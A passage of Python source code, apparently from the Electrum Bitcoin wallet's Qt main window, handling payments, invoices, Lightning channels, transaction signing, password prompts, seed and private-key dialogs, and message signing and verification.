return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
use_rbf = bool(self.config.get('use_rbf', True))
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
self.do_clear()
if not tx.is_complete():
self.show_transaction(tx)
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setEnabled(b)
#self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(QLabel(_('Lightning')), 5, 0)
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
